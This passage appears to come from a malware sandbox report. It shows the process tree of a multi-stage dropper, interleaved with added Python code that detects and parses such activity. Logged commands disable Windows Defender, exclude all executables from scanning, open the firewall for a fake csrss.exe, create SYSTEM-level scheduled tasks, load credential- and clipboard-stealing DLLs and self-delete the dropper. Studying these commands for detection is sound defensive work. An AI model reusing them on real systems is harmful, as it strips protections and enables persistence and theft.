\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:5652
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"8⤵PID:588
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:5564
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:5580
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"8⤵PID:5280
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵PID:5296
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:5292
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"8⤵PID:4628
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵PID:4488
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵PID:2884
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵PID:5660
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵PID:5976
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- Command and Scripting Interpreter: PowerShell
PID:6000 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force11⤵PID:4568
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:1268
-
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵PID:6064
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:5496
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Command and Scripting Interpreter: PowerShell
PID:5432 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:5868
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS80E3.tmp\Install.exe\" it /yGTdiduRiv 385118 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4960
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"7⤵PID:2876
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ8⤵PID:2764
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ9⤵PID:5704
-
-
-
-
-
-
-
-
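The two Install.exe subtrees above (and the SYSTEM-level rerun of Install.exe further down) repeat one sequence: `forfiles /p c:\windows\system32 /m <existing file> /c "cmd /C ..."` as an indirect launcher, `reg add ... ThreatIDDefaultAction /v <threat id> /t REG_SZ /d 6` to set Defender's default action for specific threat IDs to Allow (6), `gpupdate /force` to apply the policy, and a WMI call on MSFT_MpPreference that excludes every .exe from scanning. The csrss / NewB.exe / Install.exe scheduled tasks and the `choice /T 3 & Del` line elsewhere in the tree are the persistence and clean-up idioms. The Python below is an added example, not from the report or from the sandbox, that runs these checks over command lines copied from this tree. The ThreatIDDefaultAction value names are the documented policy values; the rule names, the trusted-directory list and the system-binary name list are my own assumptions.

```python
import re
from typing import Dict, List

# Documented data values for the Defender ThreatIDDefaultAction policy key.
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}
# Assumption: core binaries with these names should never run from outside System32.
SYSTEM_NAMES = {"csrss.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "smss.exe"}
# Assumption: inbound allow rules for programs under these paths are not reported.
TRUSTED_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\", "\\program files")

RE_THREAT = re.compile(r"reg\s+add\s+.*ThreatIDDefaultAction", re.I)
RE_V = re.compile(r'/v\s+"?(\d+)', re.I)
RE_D = re.compile(r"/d\s+(\d+)", re.I)
RE_EXCL = re.compile(r"MSFT_MpPreference\s+call\s+Add\s+(\w+)=(\S+)", re.I)
RE_FORFILES = re.compile(r'forfiles\s+/p\s+\S+\s+/m\s+(\S+)\s+/c\s+"?(\S+)', re.I)
RE_NETSH = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b(.*)", re.I)
RE_PROGRAM = re.compile(r'program="?([^"\s]+)', re.I)
RE_SCHTASKS = re.compile(r'schtasks(?:\.exe)?"?\s+/create\b(.*)', re.I)
RE_TN = re.compile(r'/tn\s+"?([^"\s]+)', re.I)
RE_SELFDEL = re.compile(r"choice\s+/c\s+y\s+/n\s+/d\s+y\s+/t\s+(\d+)\s*&\s*del\b", re.I)
TASK_FLAGS = ((r"/sc\s+onlogon", "onlogon"), (r"/rl\s+highest", "highest"),
              (r'/ru\s+"?system', "as-SYSTEM"), (r"/sc\s+minute\s+/mo\s+1\b", "every-minute"))


def triage(cmdline: str) -> List[str]:
    """Return the evasion / persistence findings for one process command line."""
    findings: List[str] = []
    c = cmdline.replace('\\"', '"')          # undo one level of cmd.exe quote escaping

    # 1. Defender policy: default action for a specific threat ID forced to Allow (6).
    #    One PowerShell line may carry several REG ADDs joined by ';' or '&'.
    for seg in re.split(r"[;&]", c):
        if RE_THREAT.search(seg):
            tid, act = RE_V.search(seg), RE_D.search(seg)
            if tid and act:
                findings.append(f"defender_threat_action: threat {tid.group(1)} -> "
                                f"{THREAT_ACTIONS.get(act.group(1), act.group(1))}")
    # 2. Defender exclusion added through the WMI provider (here: every .exe).
    for m in RE_EXCL.finditer(c):
        findings.append(f"defender_exclusion: {m.group(1)}={m.group(2)}")
    # 3. forfiles as an indirect launcher: /m names one existing file, so /c runs once.
    for m in RE_FORFILES.finditer(c):
        findings.append(f"forfiles_launcher: /m {m.group(1)} runs {m.group(2)}")
    # 4. Inbound firewall allow for a program outside the trusted directories.
    m = RE_NETSH.search(c)
    if m and "action=allow" in m.group(1).lower() and "dir=in" in m.group(1).lower():
        p = RE_PROGRAM.search(m.group(1))
        if p and not any(d in p.group(1).lower() for d in TRUSTED_DIRS):
            masq = p.group(1).lower().rsplit("\\", 1)[-1] in SYSTEM_NAMES
            findings.append(f"firewall_allow_inbound: {p.group(1)}"
                            + (" (System32 binary name outside System32)" if masq else ""))
    # 5. Scheduled-task persistence: logon trigger, highest run level, SYSTEM, or every minute.
    m = RE_SCHTASKS.search(c)
    if m:
        flags = [tag for pat, tag in TASK_FLAGS if re.search(pat, m.group(1), re.I)]
        tn = RE_TN.search(m.group(1))
        if flags:
            findings.append(f"schtasks_persistence: {tn.group(1) if tn else '?'} [{', '.join(flags)}]")
    # 6. choice used as a sleep, then del: delayed self-removal of the dropper.
    m = RE_SELFDEL.search(c)
    if m:
        findings.append(f"self_delete: after {m.group(1)}s")
    return findings


def triage_all(cmdlines) -> Dict[str, List[str]]:
    """Map each command line that produced findings to its findings."""
    return {cl: f for cl in cmdlines if (f := triage(cl))}


# Constructed test input: command lines copied from this process tree, plus one benign line.
SAMPLE_CMDLINES = [
    'forfiles /p c:\\windows\\system32 /m where.exe /c "cmd /C reg add \\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Threats\\ThreatIDDefaultAction\\" /f /v 2147735503 /t REG_SZ /d 6"',
    'powershell -WindowStyle Hidden WMIC /NAMESPACE:\\\\root\\Microsoft\\Windows\\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True',
    'powershell "cmd /C REG ADD \\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Threats\\ThreatIDDefaultAction\\" /f /v \\"225451\\" /t REG_SZ /d 6 /reg:32;'
    'REG ADD \\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Threats\\ThreatIDDefaultAction\\" /f /v \\"225451\\" /t REG_SZ /d 6 /reg:64"',
    'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\\Windows\\rss\\csrss.exe" enable=yes',
    'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\\Windows\\rss\\csrss.exe" /TN csrss /F',
    'schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:27:00 /RU "SYSTEM" /TR "\\"C:\\Users\\Admin\\AppData\\Local\\Temp\\7zS1C7C.tmp\\Install.exe\\" it /NhedidIXUK 385118 /S" /V1 /F',
    '"C:\\Windows\\System32\\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000088001\\NewB.exe" /F',
    '"C:\\Windows\\System32\\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"',
    'powershell -nologo -noprofile',
]
```

Splitting on `;` and `&` before looking for the registry key is what makes the single long PowerShell line near the end of the tree (a dozen REG ADDs for both the 32- and 64-bit views) yield one finding per threat ID instead of one per line.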
C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4812
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2744 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4872
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:236
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"5⤵PID:5320
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵PID:1760
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 5044⤵
- Program crash
PID:592
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main3⤵
- Loads dropped DLL
PID:3056 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2696 -
C:\Windows\system32\netsh.exenetsh wlan show profiles5⤵PID:2100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\699363923187_Desktop.zip' -CompressionLevel Optimal5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "4⤵PID:68
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClient5⤵
- Launches sc.exe
PID:1572
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClient confirm5⤵
- Executes dropped EXE
PID:4560
-
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLink5⤵
- Launches sc.exe
PID:4908
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLink confirm5⤵
- Executes dropped EXE
PID:4116
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"5⤵
- Executes dropped EXE
PID:1628
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLink5⤵
- Executes dropped EXE
PID:4652
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "4⤵PID:1504
-
C:\Windows\SysWOW64\sc.exeSc stop GameServerClientC5⤵
- Launches sc.exe
PID:1076
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameServerClientC confirm5⤵
- Executes dropped EXE
PID:4728
-
-
C:\Windows\SysWOW64\sc.exeSc delete PiercingNetLink5⤵
- Launches sc.exe
PID:1100
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove PiercingNetLink confirm5⤵
- Executes dropped EXE
PID:5100
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"5⤵
- Executes dropped EXE
PID:4304
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start PiercingNetLink5⤵
- Executes dropped EXE
PID:648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "4⤵PID:2892
-
C:\Windows\SysWOW64\sc.exeSc delete GameSyncLinks5⤵
- Launches sc.exe
PID:1368
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService remove GameSyncLinks confirm5⤵
- Executes dropped EXE
PID:596
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"5⤵
- Executes dropped EXE
PID:4368
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exeGameService start GameSyncLinks5⤵
- Executes dropped EXE
PID:4232
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "4⤵PID:4888
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4296
-
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"3⤵
- Executes dropped EXE
PID:2592 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F4⤵
- Creates scheduled task(s)
PID:4268
-
-
C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\ISetup8.exe"4⤵
- Executes dropped EXE
PID:4904 -
C:\Users\Admin\AppData\Local\Temp\u3s8.0.exe"C:\Users\Admin\AppData\Local\Temp\u3s8.0.exe"5⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\u3s8.1.exe"C:\Users\Admin\AppData\Local\Temp\u3s8.1.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5412
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\toolspub1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:3052 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 4925⤵
- Program crash
PID:5300
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"4⤵
- Executes dropped EXE
PID:4860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Command and Scripting Interpreter: PowerShell
PID:428
-
-
C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"C:\Users\Admin\AppData\Local\Temp\1000240001\4767d2e713f2021e8fe856e3ea638b58.exe"5⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:4192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:4232
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:3800
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:2692
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2448
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4772
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3828 -
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:2708
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:4368
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1572
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:360
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:5768
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:5504
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:5216
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵
- Executes dropped EXE
PID:5388
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵PID:5740
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"2⤵PID:728
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4560 -
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:504
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:4228
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:4352
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:2796
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:1436
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵
- Executes dropped EXE
PID:5572
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵PID:5360
-
-
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"2⤵PID:2536
-
-
C:\Program Files (x86)\GameSyncLink\GameService.exe"C:\Program Files (x86)\GameSyncLink\GameService.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2464 -
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:4412
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:2564
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:4036
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:5756
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:5476
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵
- Executes dropped EXE
PID:3824
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵PID:4816
-
-
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"2⤵PID:2324
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5356
-
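Two properties of this rendering matter when the tree is processed by hand or by script. First, image path, command line and nesting depth are fused into one string, and the depth digit is ambiguous when the command line itself ends in a digit: `-s 5044⤵` above is `-s 504` at depth 4, `/d 610⤵` is `/d 6` at depth 10, and `-ForceV112⤵` is `-ForceV1` at depth 12. Second, PIDs are reused within the run (5360 is both PiercingNetLink.exe and the fhsvc svchost; 3904 is netsh.exe and a later powershell.exe; 5824 is windefender.exe and a later gpupdate.exe), so a PID alone does not identify a process. The Python below is an added example, mine rather than the sandbox's, that parses text in this layout back into a parent/child tree, resolving the depth digit with the rule that a node can be at most one level deeper than the node rendered before it, and reports PID collisions. `SAMPLE_TREE` is a constructed excerpt: entries copied from this page and re-nested into one self-contained subtree.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Rendered entry: "<image><cmdline><depth>⤵[PID:n]"; signatures follow as "- ..." lines and
# the PID may instead arrive on its own "PID:n" line. Bare "-" lines are list closers.
PROC_RE = re.compile(r"^(?P<text>.*?)(?P<digits>\d{1,2})⤵(?:PID:(?P<pid>\d+))?\s*-?\s*$")
PID_RE = re.compile(r"^PID:(?P<pid>\d+)\s*-?\s*$")
IMAGE_RE = re.compile(r"^(?P<image>.+?\.(?:exe|dll))(?P<cmd>.*)$", re.I)


@dataclass
class Proc:
    ordinal: int                       # position in the report; unique even when PIDs repeat
    depth: int
    image: str
    cmdline: str
    pid: Optional[int] = None
    parent: Optional["Proc"] = field(default=None, repr=False)
    signatures: List[str] = field(default_factory=list)


def _resolve_depth(digits: str, text: str, prev_depth: int):
    """Split the trailing digits into (depth, digits that belong to the command line).
    A node is at most one level deeper than the previous node, so keep the deepest
    reading that respects that bound (heuristic: both readings can be valid)."""
    valid = [d for d in {int(digits[-1:]), int(digits)} if 1 <= d <= prev_depth + 1]
    if not valid:
        raise ValueError(f"no plausible depth in {text + digits!r}")
    depth = max(valid)
    return depth, text + digits[:-len(str(depth))]


def parse_tree(text: str) -> List[Proc]:
    """Parse the rendered process list into Proc nodes with parent links."""
    procs: List[Proc] = []
    stack: List[Proc] = []             # stack[i] is the latest node at depth i + 1
    cur: Optional[Proc] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        m = PROC_RE.match(line)
        if m:
            depth, body = _resolve_depth(m["digits"], m["text"], len(stack))
            im = IMAGE_RE.match(body)
            image, cmd = (im["image"], im["cmd"].strip()) if im else (body, "")
            del stack[depth - 1:]      # pop back to the parent level
            cur = Proc(len(procs), depth, image, cmd,
                       int(m["pid"]) if m["pid"] else None, stack[-1] if stack else None)
            stack.append(cur)
            procs.append(cur)
        elif line.startswith("- ") and cur is not None:
            cur.signatures.append(line[2:])
        elif (pm := PID_RE.match(line)) and cur is not None:
            cur.pid = int(pm["pid"])
    return procs


def pid_collisions(procs: List[Proc]) -> Dict[int, List[Proc]]:
    """PIDs that name more than one distinct process in the run."""
    by_pid: Dict[int, List[Proc]] = {}
    for p in procs:
        if p.pid is not None:
            by_pid.setdefault(p.pid, []).append(p)
    return {pid: ps for pid, ps in by_pid.items() if len(ps) > 1}


def ancestry(p: Proc) -> List[Proc]:
    """Root-first chain of a node's ancestors, ending with the node itself."""
    chain = []
    while p is not None:
        chain.append(p)
        p = p.parent
    return chain[::-1]


# Constructed excerpt: lines copied from this report, re-nested into one small tree.
SAMPLE_TREE = r"""
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2744 -
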